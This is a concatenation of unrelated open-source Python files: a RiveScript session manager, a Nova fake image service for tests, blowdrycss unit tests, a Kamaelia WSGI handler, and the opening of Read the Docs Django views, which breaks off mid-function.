self.fdocs[f] = self.fdocs.get(f, "") + l[2:] + '\n'
if l[0:6] == "class ": # The class we're in.
clas = l[6:].strip()
if l[0:8] == "quaject ": # For naming purposes a quaject is a class.
clas = l[8:]
if didit == False and (l[0:5] == "proc " or
l[0:8] == "intproc ")\
and 'IGNORE' not in l:
print(repr(ctx)+": "+l+": Lacking doc.", file=sys.stderr)
if l[0:8] == "endclass" or l[0:10] == "endquaject":
clas = ""
lnum += 1
if f not in self.fdocs:
print("File", f, "lacking fdoc.")
if cur != {} or comment != False:
print(repr(ctx)+": Unended comment block.", file=sys.stderr)
| |
# RiveScript-Python
#
# This code is released under the MIT License.
# See the "LICENSE" file for more information.
#
# https://www.rivescript.com/
from __future__ import unicode_literals
import copy
class SessionManager(object):
"""Base class for session management for RiveScript.
The session manager keeps track of getting and setting user variables,
for example when the ``<set>`` or ``<get>`` tags are used in RiveScript
or when the API functions like ``set_uservar()`` are called.
By default RiveScript stores user sessions in memory and provides methods
to export and import them (e.g. to persist them when the bot shuts down
so they can be reloaded). If you'd prefer a more 'active' session storage,
for example one that puts user variables into a database or cache, you can
create your own session manager that extends this class and implements its
functions.
See the ``eg/sessions`` example from the source of rivescript-python at
https://github.com/aichaos/rivescript-python for an example.
The constructor takes no required parameters. You can feel free to define
``__init__()`` however you need to.
"""
def set(self, username, args):
"""Set variables for a user.
Args:
username (str): The username to set variables for.
args (dict): Key/value pairs of variables to set for the user.
The values are usually strings, but they can be other types
as well (e.g. arrays or other dicts) for some internal data
structures such as input/reply history. A value of ``NoneType``
should indicate that the key should be deleted from the session
store.
"""
raise NotImplementedError
def get(self, username, key):
"""Retrieve a stored variable for a user.
If the user doesn't exist, this should return ``None``. If the user
*does* exist, but the key does not, this should return the
string value ``"undefined"``.
Args:
username (str): The username to retrieve variables for.
key (str): The specific variable name to retrieve.
Returns:
str: The value of the requested key, "undefined", or ``NoneType``.
"""
raise NotImplementedError
def get_any(self, username):
"""Retrieve all stored variables for a user.
If the user doesn't exist, this should return ``None``.
Args:
username (str): The username to retrieve variables for.
Returns:
dict: Key/value pairs of all stored data for the user, or ``NoneType``.
"""
raise NotImplementedError
def get_all(self):
"""Retrieve all variables about all users.
This should return a dict of dicts, where the top level keys are the
usernames of every user your bot has data for, and the values are dicts
of key/value pairs of those users. For example::
{ "user1": {
"topic": "random",
"name": "Alice",
},
"user2": {
"topic": "random",
"name": "Bob",
},
}
Returns:
dict
"""
raise NotImplementedError
def reset(self, username):
"""Reset all variables stored about a particular user.
Args:
username (str): The username to flush all data for.
"""
raise NotImplementedError
def reset_all(self):
"""Reset all variables for all users."""
raise NotImplementedError
def freeze(self, username):
"""Make a snapshot of the user's variables.
This should clone and store a snapshot of all stored variables for the
user, so that they can later be restored with ``thaw()``. This
implements the RiveScript ``freeze_uservars()`` method.
Args:
username (str): The username to freeze variables for.
"""
raise NotImplementedError
def thaw(self, username, action="thaw"):
"""Restore the frozen snapshot of variables for a user.
This should replace *all* of a user's variables with the frozen copy
that was snapshotted with ``freeze()``. If there are no frozen
variables, this function should be a no-op (maybe issue a warning?)
Args:
username (str): The username to restore variables for.
action (str):
An action to perform on the variables. Valid options are:
* ``thaw``: Restore the variables and delete the frozen copy (default).
* ``discard``: Don't restore the variables, just delete the frozen copy.
* ``keep``: Restore the variables and keep the copy still.
"""
raise NotImplementedError
def default_session(self):
"""The default session data for a new user.
You do not need to override this function. This returns a ``dict`` with
the default key/value pairs for new sessions. By default, the
session variables are as follows::
{
"topic": "random"
}
Returns:
dict: A dict of default key/value pairs for new user sessions.
"""
return dict(
topic="random",
)
class MemorySessionStorage(SessionManager):
"""The default in-memory session store for RiveScript.
This session manager keeps all user and state information in system
memory and doesn't persist anything to disk by default. This is suitable
for many simple use cases. User variables can be persisted and reloaded
from disk by using the RiveScript API functions ``get_uservars()`` and
    ``set_uservars()`` -- for example, you can export all user variables
and save them to disk as a JSON file when your program shuts down, and on
its next startup, read the JSON file from disk and use ``set_uservars()``
to put them back into the in-memory session manager.
If you'd like to implement your own session manager, for example to use
a database to store/retrieve user variables, you should extend the base
``SessionManager`` class and implement all of its functions.
Parameters:
warn (function): A function to be called with an error message to
notify when one of the functions fails due to a user not existing.
If not provided, then no warnings will be emitted from this module.
"""
def __init__(self, warn=None, *args, **kwargs):
self._fwarn = warn
self._users = {}
self._frozen = {}
def _warn(self, *args, **kwargs):
if self._fwarn is not None:
self._fwarn(*args, **kwargs)
def set(self, username, vars):
        if username not in self._users:
self._users[username] = self.default_session()
for key, value in vars.items():
if value is None:
self._users[username].pop(key, None)
else:
self._users[username][key] = value
def get(self, username, key, default="undefined"):
        if username not in self._users:
return None
return self._users[username].get(key, default)
def get_any(self, username):
        if username not in self._users:
return None
return copy.deepcopy(self._users[username])
def get_all(self):
return copy.deepcopy(self._users)
def reset(self, username):
del self._users[username]
def reset_all(self):
self._users = {}
def freeze(self, username):
if username in self._users:
self._frozen[username] = copy.deepcopy(self._users[username])
else:
self._warn("Can't freeze vars for user " + username + ": not found!")
def thaw(self, username, action="thaw"):
if username in self._frozen:
# What are we doing?
if action == "thaw":
# Thawing them out.
self._users[username] = copy.deepcopy(self._frozen[username])
del self._frozen[username]
elif action == "discard":
# Just discard the frozen copy.
del self._frozen[username]
elif action == "keep":
# Keep the frozen copy afterward.
self._users[username] = copy.deepcopy(self._frozen[username])
else:
self._warn("Unsupported thaw action")
else:
self._warn("Can't thaw vars for user " + username + ": not found!")
class NullSessionStorage(SessionManager):
"""The null session manager doesn't store any user variables.
This is used by the unit tests and isn't practical for real world usage,
as the bot would be completely unable to remember any user variables or
history.
"""
def set(self, *args, **kwargs):
pass
def get(self, *args, **kwargs):
return "undefined"
def get_any(self, *args, **kwargs): # pragma: no cover
return {}
def get_all(self, *args, **kwargs): # pragma: no cover
return {}
def reset(self, *args, **kwargs): # pragma: no cover
pass
def reset_all(self, *args, **kwargs): # pragma: no cover
pass
def freeze(self, *args, **kwargs): # pragma: no cover
pass
def thaw(self, *args, **kwargs): # pragma: no cover
pass
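# Illustrative sketch, not part of rivescript: the in-memory store's
# freeze/thaw cycle. The username and variables here are arbitrary.
if __name__ == "__main__":
    store = MemorySessionStorage()
    store.set("alice", {"name": "Alice"})
    store.freeze("alice")
    store.set("alice", {"name": "Overwritten"})
    store.thaw("alice")  # restores the frozen snapshot and discards it
    assert store.get("alice", "name") == "Alice"
    assert store.get("alice", "topic") == "random"  # from default_session()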
| |
# Copyright 2011 Justin Santa Barbara
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Implementation of a fake image service."""
import copy
import datetime
import uuid
from oslo.config import cfg
from nova import exception
import nova.image.glance
from nova.openstack.common import log as logging
CONF = cfg.CONF
CONF.import_opt('null_kernel', 'nova.compute.api')
LOG = logging.getLogger(__name__)
class _FakeImageService(object):
"""Mock (fake) image service for unit testing."""
def __init__(self):
self.images = {}
# NOTE(justinsb): The OpenStack API can't upload an image?
# So, make sure we've got one..
timestamp = datetime.datetime(2011, 1, 1, 1, 2, 3)
image1 = {'id': '155d900f-4e14-4e4c-a73d-069cbf4541e6',
'name': 'fakeimage123456',
'created_at': timestamp,
'updated_at': timestamp,
'deleted_at': None,
'deleted': False,
'status': 'active',
'is_public': False,
'container_format': 'raw',
'disk_format': 'raw',
'size': '25165824',
'properties': {'kernel_id': CONF.null_kernel,
'ramdisk_id': CONF.null_kernel,
'architecture': 'x86_64'}}
image2 = {'id': 'a2459075-d96c-40d5-893e-577ff92e721c',
'name': 'fakeimage123456',
'created_at': timestamp,
'updated_at': timestamp,
'deleted_at': None,
'deleted': False,
'status': 'active',
'is_public': True,
'container_format': 'ami',
'disk_format': 'ami',
'size': '58145823',
'properties': {'kernel_id': CONF.null_kernel,
'ramdisk_id': CONF.null_kernel}}
image3 = {'id': '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
'name': 'fakeimage123456',
'created_at': timestamp,
'updated_at': timestamp,
'deleted_at': None,
'deleted': False,
'status': 'active',
'is_public': True,
'container_format': None,
'disk_format': None,
'size': '83594576',
'properties': {'kernel_id': CONF.null_kernel,
'ramdisk_id': CONF.null_kernel}}
image4 = {'id': 'cedef40a-ed67-4d10-800e-17455edce175',
'name': 'fakeimage123456',
'created_at': timestamp,
'updated_at': timestamp,
'deleted_at': None,
'deleted': False,
'status': 'active',
'is_public': True,
'container_format': 'ami',
'disk_format': 'ami',
'size': '84035174',
'properties': {'kernel_id': CONF.null_kernel,
'ramdisk_id': CONF.null_kernel}}
image5 = {'id': 'c905cedb-7281-47e4-8a62-f26bc5fc4c77',
'name': 'fakeimage123456',
'created_at': timestamp,
'updated_at': timestamp,
'deleted_at': None,
'deleted': False,
'status': 'active',
'is_public': True,
'container_format': 'ami',
'disk_format': 'ami',
'size': '26360814',
'properties': {'kernel_id':
'155d900f-4e14-4e4c-a73d-069cbf4541e6',
'ramdisk_id': None}}
image6 = {'id': 'a440c04b-79fa-479c-bed1-0b816eaec379',
'name': 'fakeimage6',
'created_at': timestamp,
'updated_at': timestamp,
'deleted_at': None,
'deleted': False,
'status': 'active',
'is_public': False,
'container_format': 'ova',
'disk_format': 'vhd',
'size': '49163826',
'properties': {'kernel_id': CONF.null_kernel,
'ramdisk_id': CONF.null_kernel,
'architecture': 'x86_64',
'auto_disk_config': 'False'}}
image7 = {'id': '70a599e0-31e7-49b7-b260-868f441e862b',
'name': 'fakeimage7',
'created_at': timestamp,
'updated_at': timestamp,
'deleted_at': None,
'deleted': False,
'status': 'active',
'is_public': False,
'container_format': 'ova',
'disk_format': 'vhd',
'size': '74185822',
'properties': {'kernel_id': CONF.null_kernel,
'ramdisk_id': CONF.null_kernel,
'architecture': 'x86_64',
'auto_disk_config': 'True'}}
self.create(None, image1)
self.create(None, image2)
self.create(None, image3)
self.create(None, image4)
self.create(None, image5)
self.create(None, image6)
self.create(None, image7)
self._imagedata = {}
super(_FakeImageService, self).__init__()
#TODO(bcwaldon): implement optional kwargs such as limit, sort_dir
def detail(self, context, **kwargs):
"""Return list of detailed image information."""
return copy.deepcopy(self.images.values())
def download(self, context, image_id, dst_path=None, data=None):
self.show(context, image_id)
if data:
data.write(self._imagedata.get(image_id, ''))
elif dst_path:
with open(dst_path, 'wb') as data:
data.write(self._imagedata.get(image_id, ''))
def show(self, context, image_id):
"""Get data about specified image.
Returns a dict containing image data for the given opaque image id.
"""
image = self.images.get(str(image_id))
if image:
return copy.deepcopy(image)
LOG.warn('Unable to find image id %s. Have images: %s',
image_id, self.images)
raise exception.ImageNotFound(image_id=image_id)
def create(self, context, metadata, data=None):
"""Store the image data and return the new image id.
        :raises: CouldNotUploadImage if the image already exists.
"""
image_id = str(metadata.get('id', uuid.uuid4()))
metadata['id'] = image_id
if image_id in self.images:
raise exception.CouldNotUploadImage(image_id=image_id)
self.images[image_id] = copy.deepcopy(metadata)
if data:
self._imagedata[image_id] = data.read()
return self.images[image_id]
def update(self, context, image_id, metadata, data=None,
purge_props=False):
"""Replace the contents of the given image with the new data.
:raises: ImageNotFound if the image does not exist.
"""
if not self.images.get(image_id):
raise exception.ImageNotFound(image_id=image_id)
if purge_props:
self.images[image_id] = copy.deepcopy(metadata)
else:
image = self.images[image_id]
try:
image['properties'].update(metadata.pop('properties'))
except KeyError:
pass
image.update(metadata)
return self.images[image_id]
def delete(self, context, image_id):
"""Delete the given image.
:raises: ImageNotFound if the image does not exist.
"""
removed = self.images.pop(image_id, None)
if not removed:
raise exception.ImageNotFound(image_id=image_id)
def get_location(self, context, image_id):
if image_id in self.images:
return 'fake_location'
return None
_fakeImageService = _FakeImageService()
def FakeImageService():
return _fakeImageService
def FakeImageService_reset():
global _fakeImageService
_fakeImageService = _FakeImageService()
def get_valid_image_id():
return _fakeImageService.images.keys()[0]
def stub_out_image_service(stubs):
image_service = FakeImageService()
stubs.Set(nova.image.glance, 'get_remote_image_service',
lambda x, y: (image_service, y))
stubs.Set(nova.image.glance, 'get_default_image_service',
lambda: image_service)
return image_service
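# A minimal usage sketch, assuming a stubout-style test where `stubs` is a
# stubout.StubOutForTesting instance and `context` is a request context --
# both names here are hypothetical, not part of the original module:
def _example_stub_usage(stubs, context):
    FakeImageService_reset()                       # start from the pristine fixture images
    image_service = stub_out_image_service(stubs)  # patch nova.image.glance lookups
    image = image_service.show(context, get_valid_image_id())
    assert image['status'] == 'active'             # every fixture image is 'active'
    return image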
| |
# python 2
from __future__ import absolute_import, unicode_literals
from builtins import bytes
# builtins
from unittest import TestCase, main
import sys
from io import StringIO
import os
# custom
from blowdrycss.utilities import unittest_file_path, delete_file_paths
import blowdrycss.blowdry as blowdry
import blowdrycss_settings as settings
__author__ = 'chad nelson'
__project__ = 'blowdrycss'
class TestMain(TestCase):
def test_boilerplate_markdown_docs(self):
# Save original values.
project_directory = settings.project_directory
markdown_directory = settings.markdown_directory
markdown_docs = settings.markdown_docs
# Change settings
settings.project_directory = unittest_file_path(folder='test_examplesite') # Prevent 'examplesite' creation.
settings.markdown_directory = unittest_file_path(folder='test_markdown')
settings.markdown_docs = True
expected_files = (
os.path.join(settings.markdown_directory, 'clashing_aliases.md'),
os.path.join(settings.markdown_directory, 'property_aliases.md'),
)
for expected_file in expected_files: # Ensure the files do not exist.
if os.path.isfile(expected_file):
os.remove(expected_file)
blowdry.boilerplate() # Run It
for expected_file in expected_files:
self.assertTrue(os.path.isfile(expected_file), msg=expected_file)
os.remove(expected_file) # Delete
# Reset settings values.
settings.project_directory = project_directory
settings.markdown_directory = markdown_directory
settings.markdown_docs = markdown_docs
def test_boilerplate_rst_docs(self):
# Save original values.
project_directory = settings.project_directory
docs_directory = settings.docs_directory
rst_docs = settings.rst_docs
# Change settings
settings.project_directory = unittest_file_path(folder='test_examplesite') # Prevent 'examplesite' creation.
settings.docs_directory = unittest_file_path(folder='test_docs')
settings.rst_docs = True
expected_files = (
os.path.join(settings.docs_directory, 'clashing_aliases.rst'),
os.path.join(settings.docs_directory, 'property_aliases.rst'),
)
for expected_file in expected_files: # Ensure the files do not exist.
if os.path.isfile(expected_file):
os.remove(expected_file)
blowdry.boilerplate()
for expected_file in expected_files:
self.assertTrue(os.path.isfile(expected_file), msg=expected_file)
os.remove(expected_file) # Delete
# Reset settings values.
settings.project_directory = project_directory
settings.docs_directory = docs_directory
settings.rst_docs = rst_docs
def test_parse(self):
expected_class_set = {
u'medium-up', u'border-1px-solid-gray', u'padding-5', u'margin-top-10', u'display-none',
u'width-50', u'height-150px', u'color-hfff', u'font-size-25-s', u't-align-center',
u'display-inline', u'margin-top-50px', u'talign-center', u'width-150',
u'display-960-up-i', u'font-size-48', u'bold', u'margin-20', u'bgc-h000', u'c-red-i-hover',
u'hfff-hover-i', u'padding-10', u'bgc-hf8f8f8', u'text-align-center',
u'c-blue', u'height-200',
u'padding-10-s', u'height-50px', u'padding-top-10',
# Invalid though they exist in the HTML
# u'addclass3', u'addclass6', u'addclass1', u'addclass4', u'addclass5', u'hide', u'alex-grey-125', u'b',
}
substrings = [
'~~~ blowdrycss started ~~~',
'CSSBuilder Running...',
'.css',
]
project_directory = settings.project_directory
settings.project_directory = unittest_file_path()
saved_stdout = sys.stdout
try:
out = StringIO()
sys.stdout = out
class_set, css_text = blowdry.parse(recent=False, class_set=set(), css_text=b'')
self.assertTrue(expected_class_set == class_set, msg=class_set)
output = out.getvalue()
for substring in substrings:
self.assertTrue(substring in output, msg=output + '\tsubstring: ' + substring)
finally:
sys.stdout = saved_stdout
settings.project_directory = project_directory
def test_parse_on_modify_class_set(self):
expected_class_set = {
'green', 'purple-medium-up', 'bgc-h454545', # Pre-existing
'pink-hover', # Modify.html
# Exists in HTML but should not be returned
# 'not-valid',
}
substrings = [
'~~~ blowdrycss started ~~~',
'CSSBuilder Running...',
'.css',
]
project_directory = settings.project_directory
css_directory = settings.css_directory
settings.project_directory = unittest_file_path()
settings.css_directory = unittest_file_path()
current_set = {'green', 'purple-medium-up', 'bgc-h454545', }
css_file = unittest_file_path(filename='blowdry.css') # CSS file
css_min_file = unittest_file_path(filename='blowdry.min.css') # CSS.min file
with open(css_file, 'w') as generic_file:
generic_file.write('test test test')
modify_file = unittest_file_path(filename='modify.html') # Modify file
with open(modify_file, 'w') as generic_file:
generic_file.write('<html><div class="pink-hover not-valid">Modified</div></html>')
saved_stdout = sys.stdout
try:
out = StringIO()
sys.stdout = out
class_set, css_text = blowdry.parse(recent=True, class_set=current_set)
self.assertTrue(expected_class_set == class_set, msg=class_set)
output = out.getvalue()
for substring in substrings:
self.assertTrue(substring in output, msg=output + '\tsubstring: ' + substring)
finally:
sys.stdout = saved_stdout
settings.project_directory = project_directory
settings.css_directory = css_directory
delete_file_paths((css_file, css_min_file, modify_file, ))
    def test_parse_on_modify_css_text_PREEXISTING(self):
# WARNING Indentation must be preserved.
expected_css_text = b""".green {
color: green
}
.pink-hover:hover {
color: pink
}"""
substrings = [
'~~~ blowdrycss started ~~~',
'CSSBuilder Running...',
settings.output_file_name,
settings.output_extension,
]
project_directory = settings.project_directory
css_directory = settings.css_directory
settings.project_directory = unittest_file_path()
settings.css_directory = unittest_file_path()
current_set = {'green', }
current_css_text = b""".green {
color: green
}
"""
css_file = unittest_file_path(filename='blowdry.css') # CSS file
css_min_file = unittest_file_path(filename='blowdry.min.css') # CSS.min file
with open(css_file, 'w') as generic_file:
generic_file.write('test test test')
modify_file = unittest_file_path(filename='modify.html') # Modify file
with open(modify_file, 'w') as generic_file:
generic_file.write('<html><div class="pink-hover not-valid">Modified</div></html>')
saved_stdout = sys.stdout
try:
out = StringIO()
sys.stdout = out
class_set, css_text = blowdry.parse(recent=True, class_set=current_set, css_text=current_css_text)
self.assertTrue(expected_css_text == css_text, msg=css_text)
output = out.getvalue()
for substring in substrings:
self.assertTrue(substring in output, msg=output + '\tsubstring: ' + substring)
finally:
sys.stdout = saved_stdout
settings.project_directory = project_directory
settings.css_directory = css_directory
delete_file_paths((css_file, css_min_file, modify_file, ))
if __name__ == '__main__':
main()
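# To run just this module's tests (it already wires unittest.main above);
# the module filename is assumed here for illustration:
#     python test_blowdry.py -v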
| |
# -*- coding: utf-8 -*-
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import socket
import pprint
import string
import sys
import os
import re
import cStringIO
from datetime import datetime
from wsgiref.validate import validator
import LogWritable
import urls
import Axon
from Axon.ThreadedComponent import threadedcomponent
#from Axon.Component import component
import Kamaelia.Util.Log as Log
from Kamaelia.Chassis.ConnectedServer import MoreComplexServer
from Kamaelia.Protocol.HTTP.HTTPServer import HTTPServer
Axon.Box.ShowAllTransits = False
# ----------------------------------------------------------------------------------------------------
#
# Simple WSGI Handler
#
def HTML_WRAP(app):
"""
Wraps the Application object's results in HTML
"""
def gen(environ, start_response):
"""The standard WSGI interface"""
iterator = app(environ, start_response)
first_yield = iterator.next()
yield "<html>\n"
yield "<body>\n"
yield first_yield
for i in iterator:
yield i
yield "</body>\n"
yield "</html>\n"
return gen
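# A minimal sketch (assumed, not from the original file) of what HTML_WRAP
# produces: wrapping a trivial generator-style WSGI app yields the app's
# output sandwiched between <html>/<body> open and close tags.
def _example_plain_app(environ, start_response):
    """Tiny WSGI app used only to illustrate HTML_WRAP."""
    start_response('200 OK', [('Content-Type', 'text/html')])
    yield "Hello from the wrapped app"
# HTML_WRAP(_example_plain_app)(environ, start_response) would then yield:
# "<html>\n", "<body>\n", "Hello from the wrapped app", "</body>\n", "</html>\n"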
def getServerInfo(uri_server):
split_server = uri_server.split(":")
return (split_server[0], split_server[1])
def normalizeEnviron(environ):
"""
Converts environ variables to strings for wsgi compliance and deletes extraneous
fields.
"""
header_list = []
header_dict = environ['headers']
for key in header_dict:
line = "%s: %s\n" % (key, header_dict[key])
header_list.append(line)
environ['headers'] = ''.join(header_list)
environ['peerport'] = str(environ['peerport'])
environ['localport'] = str(environ['localport'])
del environ['bad']
class _WsgiHandler(threadedcomponent):
"""Choosing to run the WSGI app in a thread rather than the same
context, this means we don't have to worry what they get up
to really"""
Inboxes = {
'inbox' : 'NOT USED',
'control' : 'NOT USED',
}
Outboxes = {
'outbox' : 'used to send page fragments',
'signal' : 'send producerFinished messages',
'_signal-lw' : 'shut down the log writable',
}
def __init__(self, app_name, app, request, log_writable, WsgiConfig):
super(_WsgiHandler, self).__init__()
self.app_name = app_name
self.request = request
self.environ = request
self.app = app
#self.log_writable = log_writable
self.log_writable = LogWritable.GetLogWritable('wsgi.log', self, '_signal-lw')
self.status = self.response_headers = False
self.wsgi_config = WsgiConfig
def main(self):
self.log_writable.activate()
self.headers = self.environ["headers"]
self.server_name, self.server_port = getServerInfo(self.request["uri-server"])
self.initRequiredVars(self.wsgi_config)
self.initOptVars(self.wsgi_config)
self.munge_headers()
#stringify all variables for wsgi compliance
normalizeEnviron(self.environ)
#PEP 333 specifies that we're not supposed to buffer output here,
#so pulling the iterator out of the app object
app_iter = self.app(self.environ, self.start_response)
first_response = app_iter.next()
if self.response_headers:
self.write(first_response)
else:
raise WsgiError()
for fragment in app_iter:
page = {
'data' : fragment,
}
self.send(page, 'outbox')
app_iter.close()
self.send(Axon.Ipc.producerFinished(self), "signal")
self.send(Axon.Ipc.shutdownMicroprocess(self), '_signal-lw')
def start_response(self, status, response_headers, exc_info=None):
"""
Method to be passed to WSGI application object
"""
#TODO: Add more exc_info support
if exc_info:
raise exc_info[0], exc_info[1], exc_info[2]
self.status = status
self.response_headers = response_headers
return self.write
def write(self, body_data):
page = {
'data' : body_data,
}
self.send(page, 'outbox')
def munge_headers(self):
for header in self.environ["headers"]:
cgi_varname = "HTTP_"+header.replace("-","_").upper()
self.environ[cgi_varname] = self.environ["headers"][header]
pprint.pprint(self.environ)
pprint.pprint(self.environ["headers"])
def generateRequestMemFile(self):
"""
Creates a memfile to be stored in wsgi.input
"""
CRLF = '\r\n'
full_request = "%s %s %s/%s%s" % \
(self.environ['method'], self.environ['raw-uri'], self.environ['protocol'], self.environ['version'], CRLF)
header_list = []
for key in self.environ['headers']:
header_list.append("%s: %s%s" % (key, self.environ['headers'][key], CRLF))
        full_request = full_request + ''.join(header_list) + '\n' + self.environ['body']
print "full_request: \n" + full_request
return cStringIO.StringIO(full_request)
def initRequiredVars(self, wsgi_config):
"""
This method initializes all variables that are required to be present
        (including ones that could possibly be empty).
"""
self.environ["REQUEST_METHOD"] = self.request["method"]
# Portion of URL that relates to the application object.
self.environ["SCRIPT_NAME"] = self.app_name
# Remainder of request path after "SCRIPT_NAME"
self.environ["PATH_INFO"] = self.environ["uri-suffix"]
# Server name published to the outside world
self.environ["SERVER_NAME"] = self.server_name
# Server port published to the outside world
self.environ["SERVER_PORT"] = self.server_port
#Protocol to respond to
self.environ["SERVER_PROTOCOL"] = self.request["protocol"]
#==================================
#WSGI variables
#==================================
self.environ["wsgi.version"] = wsgi_config['WSGI_VER']
self.environ["wsgi.url_scheme"] = self.request["protocol"].lower()
self.environ["wsgi.errors"] = self.log_writable
self.environ["wsgi.multithread"] = False
self.environ["wsgi.multiprocess"] = False
self.environ["wsgi.run_once"] = True
self.environ["wsgi.input"] = self.generateRequestMemFile()
def initOptVars(self, wsgi_config):
"""This method initializes all variables that are optional"""
# Portion of request URL that follows the ? - may be empty or absent
if self.environ["uri-suffix"].find("?") != -1:
self.environ["QUERY_STRING"] = \
self.environ["uri-suffix"][self.environ["uri-suffix"].find("?")+1:]
else:
self.environ["QUERY_STRING"] = ""
# Contents of an HTTP_CONTENT_TYPE field
self.environ["CONTENT_TYPE"] = self.headers.get("content-type","")
# Contents of an HTTP_CONTENT_LENGTH field
self.environ["CONTENT_LENGTH"] = self.headers.get("content-length","")
#self.environ["DOCUMENT_ROOT"] = self.homedirectory
self.environ["PATH"] = os.environ['PATH']
self.environ["DATE"] = datetime.now().isoformat()
self.environ["SERVER_ADMIN"] = wsgi_config['SERVER_ADMIN']
self.environ["SERVER_SOFTWARE"] = wsgi_config['SERVER_SOFTWARE']
self.environ["SERVER_SIGNATURE"] = "%s Server at %s port %s" % \
(wsgi_config['SERVER_SOFTWARE'], self.server_name, self.server_port)
def unsupportedVars(self):
"""
Probably won't be used. This is just a list of environment variables that
        aren't implemented yet.
"""
consider = " **CONSIDER ADDING THIS -- eg: "
self.environ["HTTP_REFERER"] = consider + "-"
self.environ["SERVER_SIGNATURE"] = consider + "...."
self.environ["SCRIPT_FILENAME"] = consider + \
"/usr/local/httpd/sites/com.thwackety/cgi/test.pl"
self.environ["REQUEST_URI"] = consider + "/cgi-bin/test.pl"
self.environ["SCRIPT_URL"] = consider + "/cgi-bin/test.pl"
self.environ["SCRIPT_URI"] = consider + "http://thwackety.com/cgi-bin/test.pl"
self.environ["REMOTE_ADDR"] = consider + "192.168.2.5"
self.environ["REMOTE_PORT"] = consider + "56669"
self.environ["GATEWAY_INTERFACE"] = consider + "CGI/1.1"
def Handler(log_writable, WsgiConfig, substituted_path):
def _getWsgiHandler(request):
requested_uri = sanitizePath(request['raw-uri'], substituted_path)
print requested_uri
for url_item in urls.UrlList:
print 'trying ' + url_item[0]
if re.search(url_item[0], requested_uri):
                print url_item[0] + ' successful!'
u, mod, app_attr, app_name = url_item
break
module = _importWsgiModule(mod)
app = getattr(module, app_attr)
return _WsgiHandler(app_name, app, request, log_writable, WsgiConfig)
return _getWsgiHandler
def HTTPProtocol():
def foo(self,**argd):
print self.routing
return HTTPServer(requestHandlers(self.routing),**argd)
return foo
class WsgiError(Exception):
def __init__(self):
super(WsgiError, self).__init__()
def _importWsgiModule(name):
"""
Just a copy/paste of the example my_import function from here:
http://docs.python.org/lib/built-in-funcs.html
"""
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
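# For example, _importWsgiModule('xml.dom.minidom') returns the minidom
# submodule itself; a bare __import__('xml.dom.minidom') would return the
# top-level 'xml' package, which is why the getattr loop above is needed.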
def sanitizePath(uri, substituted_path):
uri = uri.replace(substituted_path, '', 1)
uri = uri.strip('/')
outputpath = []
    splitpath = uri.split("/")
for directory in splitpath:
if directory == ".":
pass
elif directory == "..":
if len(outputpath) > 0: outputpath.pop()
else:
outputpath.append(directory)
outputpath = '/'.join(outputpath)
return outputpath
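# e.g. sanitizePath('/wsgi/app/../static/./x.css', '/wsgi') -> 'static/x.css':
# the substituted prefix is stripped once, '.' segments are dropped, and '..'
# pops the previous segment, which also keeps paths from escaping the root.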
| |
"""Core views, including the main homepage, post-commit build hook,
documentation and header rendering, and server errors.
"""
from django.contrib.auth.models import User
from django.core.urlresolvers import NoReverseMatch, reverse
from django.conf import settings
from django.http import HttpResponse, HttpResponseRedirect, Http404, HttpResponseNotFound
from django.shortcuts import render_to_response, get_object_or_404, redirect
from django.template import RequestContext
from django.views.decorators.csrf import csrf_view_exempt
from django.views.static import serve
from django.views.generic import TemplateView
from haystack.query import EmptySearchQuerySet
from haystack.query import SearchQuerySet
from celery.task.control import inspect
from builds.models import Build
from builds.models import Version
from core.forms import FacetedSearchForm
from projects.models import Project, ImportedFile, ProjectRelationship
from projects.tasks import update_docs, remove_dir
from projects.utils import highest_version
import json
import mimetypes
import os
import logging
import redis
log = logging.getLogger(__name__)
pc_log = logging.getLogger(__name__+'.post_commit')
class NoProjectException(Exception):
pass
def homepage(request):
latest = (Project.objects.public(request.user)
.order_by('-modified_date')[:10])
featured = Project.objects.filter(featured=True)
return render_to_response('homepage.html',
{'project_list': latest,
'featured_list': featured},
context_instance=RequestContext(request))
def random_page(request, project=None):
imp_file = ImportedFile.objects.order_by('?')
if project:
return HttpResponseRedirect((imp_file.filter(project__slug=project)[0]
.get_absolute_url()))
return HttpResponseRedirect(imp_file[0].get_absolute_url())
def queue_depth(request):
r = redis.Redis(**settings.REDIS)
return HttpResponse(r.llen('celery'))
def queue_info(request):
i = inspect()
active_pks = []
reserved_pks = []
resp = ""
active = i.active()
if active:
active_json = json.loads(active)
for obj in active_json['build']:
active_pks.append(obj['kwargs']['pk'])
active_resp = "Active: %s " % " ".join(active_pks)
resp += active_resp
reserved = i.reserved()
if reserved:
reserved_json = json.loads(reserved)
for obj in reserved_json['build']:
reserved_pks.append(obj['kwargs']['pk'])
reserved_resp = " | Reserved %s" % " ".join(reserved_pks)
resp += reserved_resp
return HttpResponse(resp)
def live_builds(request):
builds = Build.objects.filter(state='building')[:5]
WEBSOCKET_HOST = getattr(settings, 'WEBSOCKET_HOST', 'localhost:8088')
count = builds.count()
percent = 100
if count > 1:
percent = 100 / count
return render_to_response('all_builds.html',
{'builds': builds,
'build_percent': percent,
'WEBSOCKET_HOST': WEBSOCKET_HOST},
context_instance=RequestContext(request))
@csrf_view_exempt
def wipe_version(request, project_slug, version_slug):
version = get_object_or_404(Version, project__slug=project_slug,
slug=version_slug)
if request.user not in version.project.users.all():
raise Http404("You must own this project to wipe it.")
del_dirs = [version.project.checkout_path(version.slug), version.project.venv_path(version.slug)]
for del_dir in del_dirs:
